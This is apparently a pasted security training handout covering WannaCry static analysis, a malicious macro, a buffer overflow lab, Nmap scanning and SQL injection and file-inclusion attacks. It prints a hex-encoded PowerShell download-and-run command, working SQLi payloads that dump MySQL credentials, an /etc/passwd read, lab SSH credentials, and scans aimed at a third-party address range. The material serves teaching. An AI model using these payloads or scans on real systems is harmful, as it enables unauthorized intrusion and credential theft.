Cyber Operations

1. #####################################################
2. # Offensive/Defensive Cyber #
3. # By Joe McCray #
4. #####################################################
5.  
6. - Here is a good set of slides for getting started with Linux:
7. http://www.slideshare.net/olafusimichael/linux-training-24086319
8.  
9.  
10. - Here is a good tutorial that you should complete before doing the labs below:
11. http://linuxsurvival.com/linux-tutorial-introduction/
12.  
13.  
14. - I prefer to use Putty to SSH into my Linux host.
15. - You can download Putty from here:
16. - http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
17.  
18. Here is the information to put into putty
19.  
20. Host Name: 107.191.39.106
21. protocol: ssh
22. port: 22
23. username: ciscosecurity
24. password: ciscosecurity123!#
25.  
26.  
27.  
28.  
29.  
30.  
31. Indicators of Compromise (IoC)
32. -----------------------------
33.  
34. 1. Modify the filesystem
35. 2. Modify the registry - ADVAPI32.dll (persistance)
36. 3. Modify processes/services
37. 4. Connect to the network - WS2_32.dll
38.  
39.  
40.  
41. if you can't detect a registry change across 5% of your network
42.  
43.  
44.  
45. EDR Solution
46. ------------
47.  
48.  
49. 1. Static Analysis <----------------------------------------- Cloud based static analysis
50. Learn everything I can without actually running the file
51. - Modify FS - File integrity checker
52. - Modify registry
53. - Modify processes/services
54. - Connect to the network
55.  
56.  
57.  
58. 2. Dynamic Analysis
59. Runs the file in a VM/Sandbox
60.  
61. ################
62. # The Scenario #
63. ################
64. You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).
65.  
66.  
67. The fastest thing you can do is perform static analysis.
68.  
69.  
70.  
71.  
72. ###################
73. # Static Analysis #
74. ###################
75.  
76. ---------------------------Type This-----------------------------------
77.  
78. cd ~/static_analysis
79.  
80. file wannacry.exe
81.  
82. cp wannacry.exe malware.pdf
83.  
84. file malware.pdf
85.  
86. hexdump -n 2 -C wannacry.exe
87.  
88. ----------------------------------------------------------------------
89.  
90.  
91. ***What is '4d 5a' or 'MZ'***
92. -------------------------Paste this URL into Firefox-----------------------------------
93. http://www.garykessler.net/library/file_sigs.html
94. ---------------------------------------------------------------------------------------
95.  
96.  
97.  
98. ---------------------------Type This-----------------------------------
99. cd ~/static_analysis
100.  
101. objdump -x wannacry.exe
102.  
103. objdump -x wannacry.exe | less
104. q
105.  
106. strings wannacry.exe
107.  
108. strings wannacry.exe | grep -i dll
109.  
110. strings wannacry.exe | grep -i library
111.  
112. strings wannacry.exe | grep -i reg
113.  
114. strings wannacry.exe | grep -i key
115.  
116. strings wannacry.exe | grep -i rsa
117.  
118. strings wannacry.exe | grep -i open
119.  
120. strings wannacry.exe | grep -i get
121.  
122. strings wannacry.exe | grep -i mutex
123.  
124. strings wannacry.exe | grep -i irc
125.  
126. strings wannacry.exe | grep -i join
127.  
128. strings wannacry.exe | grep -i admin
129.  
130. strings wannacry.exe | grep -i list
131. ----------------------------------------------------------------------
132.  
133.  
134.  
135.  
136.  
137. ---------------------------Type This-----------------------------------
138. cd ~/static_analysis
139. pe info wannacry.exe
140. pe check wannacry.exe
141. pe dump --section text wannacry.exe
142. pe dump --section data wannacry.exe
143. pe dump --section rsrc wannacry.exe
144. pe dump --section reloc wannacry.exe
145. strings rdata | less
146. strings rsrc | less
147. strings text | less
148. ----------------------------------------------------------------------
149.  
150.  
151.  
152.  
153.  
154.  
155.  
156.  
157. Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"
158.  
159. Quick Google search for "wannacry ransomeware analysis"
160.  
161.  
162. Reference
163. https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
164.  
165. - Yara Rule -
166.  
167.  
168. Strings:
169. $s1 = “Ooops, your files have been encrypted!” wide ascii nocase
170. $s2 = “Wanna Decryptor” wide ascii nocase
171. $s3 = “.wcry” wide ascii nocase
172. $s4 = “WANNACRY” wide ascii nocase
173. $s5 = “WANACRY!” wide ascii nocase
174. $s7 = “icacls . /grant Everyone:F /T /C /Q” wide ascii nocase
175.  
176.  
177.  
178.  
179.  
180.  
181.  
182. Ok, let's look for the individual strings
183.  
184.  
185. ---------------------------Type This-----------------------------------
186. cd ~/static_analysis
187.  
188. strings wannacry.exe | grep -i ooops
189.  
190. strings wannacry.exe | grep -i wanna
191.  
192. strings wannacry.exe | grep -i wcry
193.  
194. strings wannacry.exe | grep -i wannacry
195.  
196. strings wannacry.exe | grep -i wanacry **** Matches $s5, hmmm.....
197. ----------------------------------------------------------------------
198.  
199.  
200.  
201.  
202.  
203. ####################################
204. # Tired of GREP - let's try Python #
205. ####################################
206. Decided to make my own script for this kind of stuff in the future. This is a really good script for the basics of static analysis
207.  
208. Reference:
209. https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
210.  
211.  
212. This is really good for showing some good signatures to add to the Python script
213.  
214.  
215. ---------------------------Type This-----------------------------------
216. cd ~/static_analysis
217.  
218. nano am.py
219.  
220. python3 am.py wannacry.exe
221. ----------------------------------------------------------------------
222.  
223.  
224. #####################################################
225. # Analyzing Macro Embedded Malware #
226. #####################################################
227. ---------------------------Type This-----------------------------------
228. cd ~/static_analysis/oledump
229.  
230. python oledump.py 064016.doc
231.  
232. python oledump.py 064016.doc -s A4 -v
233. -----------------------------------------------------------------------
234.  
235.  
236.  
237. - From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
238. - Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
239.  
240. ---------------------------Type This-----------------------------------
241. python oledump.py 064016.doc -s A5 -v
242. -----------------------------------------------------------------------
243.  
244. - As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
245.  
246. ---------------------------Type This-----------------------------------
247. python oledump.py 064016.doc -s A3 -v
248.  
249. - Look for "GVhkjbjv" and you should see:
250.  
251. 636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
252.  
253. - Take that long blob that starts with 636D and finishes with 653B and paste it in:
254. http://www.rapidtables.com/convert/number/hex-to-ascii.htm
255. -----------------------------------------------------------------------
256.  
257.  
258.  
259.  
260. #########################################
261. # Security Operations Center Job Roles #
262. # Intrusion Analysis Level 1 #
263. #########################################
264. Required Technical Skills: Comfortable with basic Linux/Windows (MCSA/Linux+)
265. Comfortable with basic network (Network+)
266. Comfortable with security fundamentals (Security+)
267.  
268.  
269.  
270.  
271.  
272. Job Task: Process security events, follow incident response triage playbook
273.  
274. #########################################
275. # Security Operations Center Job Roles #
276. # Intrusion Analysis Level 2 #
277. #########################################
278.  
279. Required Technical Skills: Comfortable with basic Linux/Windows system administration
280. Comfortable with basic network administration
281. Comfortable with basic programming
282. Comfortable researching IT security issues
283.  
284.  
285.  
286.  
287.  
288. Job Task: Perform detailed malware analysis, assist with development of the incident response triage playbook
289.  
290. #########################################
291. # Security Operations Center Job Roles #
292. # Intrusion Analysis Level 3 #
293. #########################################
294.  
295. Required Technical Skills: Strong statistical analysis background
296. Strong programming background (C, C++, Java, Assembly, scripting languages)
297. Advanced system/network administration background
298. Comfortable researching IT security issues
299.  
300.  
301.  
302.  
303.  
304. Job Task: Perform detailed malware analysis
305. Perform detailed statistical analysis
306. Assist with development of the incident response triage playbook
307.  
308.  
309.  
310.  
311. -------------------------------------------------------------------------------------------------------------------------
312. #######################
313. # Passive Recon #
314. # aka: OSINT #
315. # aka: Footprinting #
316. #######################
317.  
318. - Wikipedia Page
319. - Are they Public or Private?
320. - Does the target have any subsidiaries?
321. - Have they had any scandals?
322.  
323. - Robtex
324. - Show system map
325.  
326. - Sample OSINT Report:
327. https://infosecaddicts-files.s3.amazonaws.com/OSINT_Innophos.doc
328.  
329. - Misc
330. OSINT on a hacker group:
331. https://en.wikipedia.org/wiki/Anonymous_(group)
332. https://en.wikipedia.org/wiki/LulzSec
333.  
334. OSINT on a terrorist group:
335. https://en.wikipedia.org/wiki/Al-Qaeda
336. https://en.wikipedia.org/wiki/Taliban
337. https://en.wikipedia.org/wiki/Islamic_State_of_Iraq_and_the_Levant
338.  
339.  
340.  
341.  
342. Step 1: Download Nmap
343. --------------------
344. Windows: https://nmap.org/dist/nmap-7.70-setup.exe
345. Mac OS X: https://nmap.org/dist/nmap-7.70.dmg
346.  
347. Linux:
348. --- Fedora/CentOS/RHEL: sudo yum install -y nmap
349. --- Ubuntu/Mint/Debian: sudo apt-get install -y nmap
350.  
351.  
352.  
353. ########################
354. # Scanning Methodology #
355. ########################
356.  
357. - Ping Sweep
358. What's alive?
359. ------------
360. Note: On windows you won't need to use the word "sudo" in front of the command below:
361.  
362. ---------------------------On Linux or Mac OS X type This-----------------------------------
363. sudo nmap -sP 157.166.226.*
364.  
365. ---------------------------or on Windows type:---------------------------------------------
366. c:\nmap -sP 157.166.226.*
367.  
368. --------------------------------------------------------------------------------------------
369.  
370.  
371.  
372. -if -SP yields no results try:
373. Note: On windows you won't need to use the word "sudo" in front of the command below:
374. ---------------------------On Linux or Mac OS X type This-----------------------------------
375. sudo nmap -sL 157.166.226.*
376.  
377. ---------------------------or on Windows type:---------------------------------------------
378. c:\nmap -sL 157.166.226.*
379.  
380. ------------------------------------------------------------------------------------------
381.  
382.  
383.  
384. -Look for hostnames:
385. Note: On windows you won't need to use the word "sudo" in front of the command below:
386. ---------------------------On Linux or Mac OS X type This-----------------------------------
387. sudo nmap -sL 157.166.226.* | grep cnn
388.  
389. ---------------------------or on Windows type:---------------------------------------------
390. c:\nmap -sP 157.166.226.* | findstr "cnn"
391.  
392. -------------------------------------------------------------------------------------------
393.  
394.  
395.  
396. - Port Scan
397. What's where?
398. ------------
399. Note: On windows you won't need to use the word "sudo" in front of the command below:
400. ---------------------------On Linux or Mac OS X type This-----------------------------------
401. sudo nmap -sS 162.243.126.247
402.  
403. ---------------------------or on Windows type:----------------------------------------------
404. c:\nmap -sS 162.243.126.247
405.  
406. --------------------------------------------------------------------------------------------
407.  
408.  
409.  
410. - Bannergrab/Version Query
411. What versions of software are running
412. -------------------------------------
413. Note: On windows you won't need to use the word "sudo" in front of the command below:
414. ---------------------------On Linux or Mac OS X type This-----------------------------------
415. sudo nmap -sV 162.243.126.247
416.  
417. ---------------------------or on Windows type:---------------------------------------------
418. c:\nmap -sV 162.243.126.247
419. -------------------------------------------------------------------------------------------
420.  
421.  
422.  
423. Let's dig into this a little bit more:
424. -------------------------------------
425. Note: On windows you won't need to use the word "sudo" in front of the command below:
426. ---------------------------On Linux or Mac OS X type This-----------------------------------
427. sudo nmap -sV --script=http-headers 162.243.126.247 -p 80,443
428.  
429. ---------------------------or on Windows type:---------------------------------------------
430. c:\nmap -sV --script=http-headers 162.243.126.247 -p 80,443
431. -------------------------------------------------------------------------------------------
432.  
433.  
434.  
435. - Vulnerability Research
436. Lookup the banner versions for public exploits
437. ----------------------------------------------
438. http://exploit-db.com
439. http://securityfocus.com/bid
440. https://packetstormsecurity.com/files/tags/exploit/
441.  
442. ---------------------------------------------------------------------------------------------------------------------------------
443.  
444.  
445.  
446. Network Penetration Testing Process (known vulnerabilities)
447. -----------------------------------------------------------
448.  
449.  
450. 1. Ping Sweep:
451. The purpose of this step is to identify live hosts
452.  
453. nmap -sP <ip-address/ip-range>
454.  
455.  
456. 2. Port Scan
457. Identify running services. We use the running services to map the network topology.
458.  
459. nmap -sS <ip-address/ip-range>
460.  
461.  
462. 3. Bannergrab
463. Identify the version of version of software running on each port
464.  
465. nmap -sV <ip-address/ip-range>
466.  
467.  
468.  
469. 4. Vulnerability Research
470. Use the software version number to research and determine if it is out of date (vulnerable).
471.  
472. exploit-db.com/search
473.  
474.  
475.  
476.  
477.  
478.  
479.  
480.  
481.  
482. Skill Level 1. Run the scanners
483. -------------------------------
484. Nexpose
485. Qualys
486. Retina
487. Nessus known vulnerabilities
488. OpenVas
489. Foundscan
490. GFI LanGuard
491. NCircle
492.  
493.  
494. Skill Level 2. Manual vulnerability validation (known vulnerabilities)
495. -----------------------------------------------------------------------
496.  
497. windows -> systeminfo
498. Linux-> dpkg -l (Debian/Ubuntu/Mint)
499. rpm -qa (RHEL/Fedora/Centos)
500.  
501. Mac OS X-> sudo find / -iname *.app
502.  
503.  
504.  
505.  
506.  
507.  
508.  
509. #####################################
510. # Quick Stack Based Buffer Overflow #
511. #####################################
512.  
513. - You can download everything you need for this exercise from the links below (copy nc.exe into the c:\windows\system32 directory)
514. http://45.63.104.73/ExploitLab.zip
515. http://45.63.104.73/nc-password-is-netcat.zip <--- save this file to your c:\windows\system32 directory
516.  
517.  
518. - Extract the ExploitLab.zip file to your Desktop
519.  
520. - Go to folder on your desktop ExploitLab\2-VulnServer, and run vulnserv.exe
521.  
522.  
523.  
524. - Open a new command prompt and type:
525.  
526. ---------------------------Type This-----------------------------------
527. nc localhost 9999
528. --------------------------------------------------------------------------
529.  
530. If you don't have netcat you can download it from here:
531. http://45.63.104.73/nc-password-is-netcat.zip
532.  
533. The file nc.zip is password protected (password is 'password'), you'll have to exclude it from your anti-virus and either add it to your PATH, or copy it to your c:\Windows\System32\ folder.
534.  
535.  
536. - In the new command prompt window where you ran nc type:
537. HELP
538.  
539. - Go to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts
540. - Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
541.  
542. - Now double-click on 1-simplefuzzer.py
543. - You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
544.  
545.  
546. - Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
547.  
548. - Now go to folder C:\Users\student\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
549.  
550. - Go back to folder C:\Users\student\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
551.  
552. - Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
553.  
554. - Now isolate the crash by restarting your debugger and running script 2-3000chars.py
555.  
556. - Calculate the distance to EIP by running script 3-3000chars.py
557. - This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
558.  
559. 4-count-chars-to-EIP.py
560. - In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
561. - so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
562.  
563. 5-2006char-eip-check.py
564. - In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242
565.  
566. 6-jmp-esp.py
567. - In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll
568.  
569. 7-first-exploit
570. - In this script we actually do the stack overflow and launch a bind shell on port 4444
571.  
572. 8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.
573.  
574.  
575. ------------------------------
576.  
577.  
578.  
579. Skill Level 3. Identify unknown vulnerabilities
580. -----------------------------------------------
581.  
582. - App Type
583. ------------
584. Stand Alone Client Server Web App
585.  
586. ***(vulnerserver.exe)***
587.  
588.  
589. - Input TYpe
590. -------------
591. FIle logical network port Browser
592. Keyboard
593. Mouse
594.  
595.  
596.  
597. ***(9999)***
598.  
599.  
600. - Map & Fuzz app entry points:
601. ------------------------------
602. - Commands ***(commands)***
603. - Methods
604. - Verbs
605. - functions
606. - subroutines
607. - controllers
608.  
609.  
610. - Isolate the crash
611. -------------------
612. App seems to reliably crash at TRUN 2100
613.  
614.  
615. - Calculate the distance to EIP
616. -------------------------------
617. Distance to EIP is 2006
618.  
619. We found that EIP was populated with the value: 396F4338
620. 396F4338 is 8 (38), C (43), o (6F), 9 (39) so we search for 8Co9 in the non_repeating pattern
621.  
622. An online tool that we can use for this is:
623. https://zerosum0x0.blogspot.com/2016/11/overflow-exploit-pattern-generator.html
624.  
625.  
626.  
627. - Redirect Program Execution
628. ----------------------------
629. A 3rd party dll named essfunc.dll seems to be the best candidate for the 'JMP ESP' instruction.
630. We learned that we control EAX and ESP in script 2.
631.  
632.  
633.  
634.  
635.  
636. - Implement Shellcode
637. ---------------------
638. There are only 2 things that can go wrong with shellcode:
639. - Not enough space
640. - Bad characters
641.  
642.  
643.  
644.  
645.  
646.  
647.  
648. #######################################################
649. # Open the following web links below as tabs #
650. # For each web link answer all of the questions below #
651. #######################################################
652. https://www.exploit-db.com/exploits/46762
653. https://www.exploit-db.com/exploits/46070
654. https://www.exploit-db.com/exploits/40713
655. https://www.exploit-db.com/exploits/46458
656. https://www.exploit-db.com/exploits/40712
657. https://www.exploit-db.com/exploits/40714
658. https://www.exploit-db.com/exploits/40680
659. https://www.exploit-db.com/exploits/40673
660. https://www.exploit-db.com/exploits/40681
661. https://www.exploit-db.com/exploits/37731
662. https://www.exploit-db.com/exploits/31254
663. https://www.exploit-db.com/exploits/31255
664. https://www.exploit-db.com/exploits/27703
665. https://www.exploit-db.com/exploits/27277
666. https://www.exploit-db.com/exploits/26495
667. https://www.exploit-db.com/exploits/24557
668. https://www.exploit-db.com/exploits/39417
669. https://www.exploit-db.com/exploits/23243
670.  
671.  
672.  
673. ###############################
674. ###################### # Class Exploit Dev Quiz Task # ######################
675. ###############################
676. 1. Vulnerable Software Info
677. a- Product Name
678. b- Software version
679. c- Available for download
680.  
681.  
682. 2. Target platform
683. a- OS Name (ex: Windows XP)
684. b- Service pack (ex: SP3)
685. c- Language pack (ex: English)
686.  
687.  
688. 3. Exploit info
689. a- modules imported (ex: sys, re, os)
690. b- application entry point (ex: TRUN)
691. c- distance to EIP (ex: 2006)
692. d- how is code redirection done (ex: JMP ESP, JMP ESI)
693. e- number of NOPs (ex: 10 * \x90 = 10 NOPs)
694. f- length of shellcode (ex: 368)
695. g- bad characters (ex: \x0a\x00\x0d)
696. h- is the target ip hard-coded
697. i- what does the shellcode do (ex: bind shell, reverse shell, calc)
698. j- what is the total buffer length
699. k- does the exploit do anything to ensure the buffer doesn't exceed a certain length
700. l- Is this a server side or client-side exploit
701.  
702.  
703.  
704.  
705.  
706.  
707.  
708.  
709. #########################################
710. # FreeFloat FTP Server Exploit Analysis #
711. #########################################
712.  
713.  
714.  
715. Analyze the following exploit code:
716. https://www.exploit-db.com/exploits/15689/
717.  
718. 1. What is the target platform that this exploit works against?
719. 2. What is the variable name for the distance to EIP?
720. 3. What is the actual distance to EIP in bytes?
721. 4. Describe what is happening in the variable ‘junk2’
722.  
723.  
724.  
725.  
726. Analysis of the training walk-through based on EID: 15689:
727. http://45.63.104.73/ff.zip
728.  
729.  
730.  
731.  
732. ff1.py
733. 1. What does the sys module do?
734. 2. What is sys.argv[1] and sys.argv[2]?
735. 3. What application entry point is being attacked in this script?
736.  
737.  
738.  
739. ff2.py
740. 1. Explain what is happening in lines 18 - 20 doing.
741. 2. What is pattern_create.rb doing and where can I find it?
742. 3. Why can’t I just double click the file to run this script?
743.  
744.  
745.  
746. ff3.py
747. 1. Explain what is happening in lines 17 - to 25?
748. 2. Explain what is happening in lines 30 - to 32?
749. 3. Why is everything below line 35 commented out?
750.  
751.  
752.  
753. ff4.py
754. 1. Explain what is happening in lines 13 to 15.
755. 2. Explain what is happening in line 19.
756. 3. What is the total length of buff?
757.  
758.  
759.  
760. ff5.py
761. 1. Explain what is happening in line 15.
762. 2. What is struct.pack?
763. 3. How big is the shellcode in this script?
764.  
765.  
766.  
767. ff6.py
768. 1. What is the distance to EIP?
769. 2. How big is the shellcode in this script?
770. 3. What is the total byte length of the data being sent to this app?
771.  
772.  
773.  
774.  
775. ff7.py
776. 1. What is a tuple in python?
777. 2. How big is the shellcode in this script?
778. 3. Did your app crash in from this script?
779.  
780.  
781.  
782.  
783. ff8.py
784. 1. How big is the shellcode in this script?
785. 2. What is try/except in python?
786. 3. What is socket.SOCK_STREAM in Python?
787.  
788.  
789.  
790. ff9.py
791. 1. What is going on in lines 19 and 20?
792. 2. What is the length of the NOPs?
793. 3. From what DLL did the address of the JMP ESP come from?
794.  
795.  
796.  
797.  
798. ff010.py
799. 1. What is going on in lines 18 - 20?
800. 2. What is going on in lines 29 - 32?
801. 3. How would a stack adjustment help this script?
802.  
803.  
804.  
805. #########################################
806. # Offensive Cyber Operations Job Roles #
807. # Intrusion Analysis Level 1 #
808. #########################################
809. Required Technical Skills: Comfortable with basic Linux/Windows (MCSA/Linux+)
810. Comfortable with basic network (Network+)
811. Comfortable with security fundamentals (Security+)
812.  
813.  
814.  
815. Job Task: Run network security scanners and assist with documentation of known vulnerabilities
816.  
817.  
818. Tools Used:
819. Nmap
820. Nexpose
821. Qualys
822. Retina
823. Nessus known vulnerabilities
824. OpenVas
825. Foundscan
826. GFI LanGuard
827. NCircle
828.  
829.  
830.  
831. #########################################
832. # Offensive Cyber Operations Job Roles #
833. # Intrusion Analysis Level 2 #
834. #########################################
835. Required Technical Skills: Comfortable with basic Linux/Windows system administration
836. Comfortable with basic network administration
837. Comfortable with basic programming
838. Comfortable researching IT security issues
839.  
840.  
841.  
842. Job Task: Run network security scanners and assist with document of known vulnerabilities
843. Perform manual vulnerability validation
844. Analyze public exploit and develop threat analysis reports
845. Assess simple applications for vulnerabilities
846.  
847.  
848.  
849. #########################################
850. # Security Operations Center Job Roles #
851. # Intrusion Analysis Level 3 #
852. #########################################
853.  
854. Required Technical Skills: Strong programming background (C, C++, Java, Assembly, scripting languages)
855. Advanced system/network administration background
856. Comfortable researching IT security issues
857.  
858.  
859.  
860.  
861.  
862. Job Task: Perform manual vulnerability validation
863. Analyze public exploit and develop threat analysis reports
864. Assess complex applications for vulnerabilities
865.  
866.  
867.  
868.  
869.  
870.  
871.  
872.  
873. ##################################
874. # Basic: Web Application Testing #
875. ##################################
876.  
877. Most people are going to tell you reference the OWASP Testing guide.
878. https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
879.  
880. I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.
881.  
882.  
883. The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.
884.  
885. 1. Does the website talk to a DB?
886. - Look for parameter passing (ex: site.com/page.php?id=4)
887. - If yes - try SQL Injection
888.  
889. 2. Can I or someone else see what I type?
890. - If yes - try XSS
891.  
892. 3. Does the page reference a file?
893. - If yes - try LFI/RFI
894.  
895. Let's start with some manual testing against 45.63.104.73
896.  
897.  
898. #######################
899. # Attacking PHP/MySQL #
900. #######################
901.  
902. Go to LAMP Target homepage
903. http://45.63.104.73/
904.  
905.  
906.  
907. Clicking on the Acer Link:
908. http://45.63.104.73/acre2.php?lap=acer
909.  
910. - Found parameter passing (answer yes to question 1)
911. - Insert ' to test for SQLI
912.  
913. ---------------------------Type This-----------------------------------
914.  
915. http://45.63.104.73/acre2.php?lap=acer'
916.  
917. -----------------------------------------------------------------------
918.  
919. Page returns the following error:
920. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''acer''' at line 1
921.  
922.  
923.  
924. In order to perform union-based sql injection - we must first determine the number of columns in this query.
925. We do this using the ORDER BY
926.  
927. ---------------------------Type This-----------------------------------
928.  
929. http://45.63.104.73/acre2.php?lap=acer' order by 100-- +
930. -----------------------------------------------------------------------
931.  
932. Page returns the following error:
933. Unknown column '100' in 'order clause'
934.  
935.  
936. ---------------------------Type This-----------------------------------
937.  
938. http://45.63.104.73/acre2.php?lap=acer' order by 50-- +
939. -----------------------------------------------------------------------
940.  
941. Page returns the following error:
942. Unknown column '50' in 'order clause'
943.  
944.  
945. ---------------------------Type This-----------------------------------
946.  
947. http://45.63.104.73/acre2.php?lap=acer' order by 25-- +
948. -----------------------------------------------------------------------
949.  
950. Page returns the following error:
951. Unknown column '25' in 'order clause'
952.  
953.  
954. ---------------------------Type This-----------------------------------
955.  
956. http://45.63.104.73/acre2.php?lap=acer' order by 12-- +
957. -----------------------------------------------------------------------
958.  
959. Page returns the following error:
960. Unknown column '12' in 'order clause'
961.  
962.  
963. ---------------------------Type This-----------------------------------
964.  
965. http://45.63.104.73/acre2.php?lap=acer' order by 6-- +
966. -----------------------------------------------------------------------
967.  
968. ---Valid page returned for 5 and 6...error on 7 so we know there are 6 columns
969.  
970.  
971.  
972. Now we build out the union all select statement with the correct number of columns
973.  
974. Reference:
975. http://www.techonthenet.com/sql/union.php
976.  
977.  
978. ---------------------------Type This-----------------------------------
979.  
980. http://45.63.104.73/acre2.php?lap=acer' union all select 1,2,3,4,5,6-- +
981. -----------------------------------------------------------------------
982.  
983.  
984.  
985. Now we negate the parameter value 'acer' by turning into the word 'null':
986. ---------------------------Type This-----------------------------------
987.  
988. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,4,5,6-- j
989. -----------------------------------------------------------------------
990.  
991. We see that a 4 and a 5 are on the screen. These are the columns that will echo back data
992.  
993.  
994. Use a cheat sheet for syntax:
995. http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
996.  
997. ---------------------------Type This-----------------------------------
998.  
999. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),5,6-- j
1000.  
1001. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),version(),6-- j
1002.  
1003. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@version,6-- +
1004.  
1005. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@datadir,6-- +
1006.  
1007.  
1008. http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user,password,6 from mysql.user -- a
1009.  
1010. -----------------------------------------------------------------------
1011.  
1012.  
1013.  
1014. ########################
1015. # Question I get a lot #
1016. ########################
1017. Sometimes students ask about the "-- j" or "-- +" that I append to SQL injection attack string.
1018.  
1019. Here is a good reference for it:
1020. https://www.symantec.com/connect/blogs/mysql-injection-comments-comments
1021.  
1022. Both attackers and penetration testers alike often forget that MySQL comments deviate from the standard ANSI SQL specification. The double-dash comment syntax was first supported in MySQL 3.23.3. However, in MySQL a double-dash comment "requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on)." This double-dash comment syntax deviation is intended to prevent complications that might arise from the subtraction of negative numbers within SQL queries. Therefore, the classic SQL injection exploit string will not work against backend MySQL databases because the double-dash will be immediately followed by a terminating single quote appended by the web application. However, in most cases a trailing space needs to be appended to the classic SQL exploit string. For the sake of clarity we'll append a trailing space and either a "+" or a letter.
1023.  
1024.  
1025.  
1026.  
1027. #########################
1028. # File Handling Attacks #
1029. #########################
1030.  
1031. Here we see parameter passing, but this one is actually a yes to question number 3 (reference a file)
1032.  
1033. ---------------------------Type This-----------------------------------
1034.  
1035. http://45.63.104.73/showfile.php?filename=about.txt
1036.  
1037. -----------------------------------------------------------------------
1038.  
1039.  
1040. See if you can read files on the file system:
1041. ---------------------------Type This-----------------------------------
1042.  
1043. http://45.63.104.73/showfile.php?filename=/etc/passwd
1044. -----------------------------------------------------------------------
1045.  
1046. We call this attack a Local File Include or LFI.
1047.  
1048. Now let's find some text out on the internet somewhere:
1049. https://www.gnu.org/software/hello/manual/hello.txt
1050.  
1051.  
1052. Now let's append that URL to our LFI and instead of it being Local - it is now a Remote File Include or RFI:
1053.  
1054. ---------------------------Type This-----------------------------------
1055.  
1056. http://45.63.104.73/showfile.php?filename=https://www.gnu.org/software/hello/manual/hello.txt
1057. -----------------------------------------------------------------------
1058.  
1059. #########################################################################################
1060. # SQL Injection #
1061. # http://45.63.104.73/1-Intro_To_SQL_Intection.pptx #
1062. #########################################################################################
1063.  
1064.  
1065. - Another quick way to test for SQLI is to remove the paramter value
1066.  
1067.  
1068. #############################
1069. # Error-Based SQL Injection #
1070. #############################
1071. ---------------------------Type This-----------------------------------
1072.  
1073. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
1074. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
1075. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
1076. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
1077. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
1078. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" - just means to keep going until you run out of databases
1079. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
1080. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
1081. http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
1082.  
1083. -----------------------------------------------------------------------
1084.  
1085.  
1086.  
1087. #############################
1088. # Union-Based SQL Injection #
1089. #############################
1090.  
1091. ---------------------------Type This-----------------------------------
1092.  
1093. http://45.77.162.239/bookdetail.aspx?id=2 order by 100--
1094. http://45.77.162.239/bookdetail.aspx?id=2 order by 50--
1095. http://45.77.162.239/bookdetail.aspx?id=2 order by 25--
1096. http://45.77.162.239/bookdetail.aspx?id=2 order by 10--
1097. http://45.77.162.239/bookdetail.aspx?id=2 order by 5--
1098. http://45.77.162.239/bookdetail.aspx?id=2 order by 6--
1099. http://45.77.162.239/bookdetail.aspx?id=2 order by 7--
1100. http://45.77.162.239/bookdetail.aspx?id=2 order by 8--
1101. http://45.77.162.239/bookdetail.aspx?id=2 order by 9--
